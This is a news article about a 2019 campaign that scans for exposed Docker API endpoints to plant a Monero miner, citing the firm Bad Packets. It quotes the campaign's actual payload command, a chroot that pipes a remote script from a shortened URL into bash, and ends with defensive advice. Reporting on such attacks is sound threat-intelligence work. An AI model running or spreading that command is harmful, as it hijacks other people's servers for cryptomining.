Unknown hackers have launched a new campaign that’s actively scanning for vulnerable Docker application container instances to inject cryptomining code.

Discovered by cybersecurity firm Bad Packets LLC, the group is actively scanning for vulnerable Docker instances that have application programming interface endpoints exposed to the internet.

Although efforts by hackers to find and hijack servers are common, this case is specifically notable because of the volume: Those behind it are scanning more than 59,000 IP networks in an attempt to identify vulnerable instances.

“What set this campaign apart was the large uptick of scanning activity,” Troy Mursch, chief research officer and co-founder of Bad Packets, told ZDNet Tuesday. “This alone warranted further investigation to find out what this botnet was up to. This isn’t your average script kiddie exploit attempt. There was a moderate level of effort put into this campaign, and we haven’t fully analyzed every single thing it does as of yet.”

Once a vulnerable Docker instance is located, a command is run to install the XMRRig script that hijacks the server to mine for the Monero cryptocurrency.

Opportunistic mass scanning activity detected targeting exposed Docker API endpoints.

These scans create a container using an Alpine Linux image, and execute the payload via:
"Command": "chroot /mnt /bin/sh -c 'curl -sL4 https://t.co/q047bRPUyj | bash;'",#threatintel pic.twitter.com/vxszV5SF1o

— Bad Packets Report (@bad_packets) November 25, 2019

Monero has long been the favorite cryptocurrency of hackers. Unlike bitcoin and other cryptocurrencies that use a public blockchain, thus making transactions traceable, Monero is private and difficult if not impossible to trace.

This isn’t the first time Docker has been targeted by those attempting to install cryptomining code. In March, unpatched Docker hosts were targeted using a runC vulnerability with access also gained by Docker’s remote API being open and public, and Monero mining software was installed.

And Last month, a cryptojacking worm dubbed “Gradoid” was spotted in the wild after spreading to more than 2,000 unsecured Docker hosts. If this sounds repetitive, it should. The hackers exploited Docker vulnerabilities to install Monero cryptomining code.

In this new campaign, as of Tuesday the miners may have been actively scanning but had yet to profit much. Mursch estimates that have managed to mine only 14.82 Monero (XMR), worth about $832.

Users running Docker instances are being advised to check if they’re exposing their API endpoints and, if they are, to close the ports and terminate unrecognized running containers.

Image: 159526894@N02/Flickr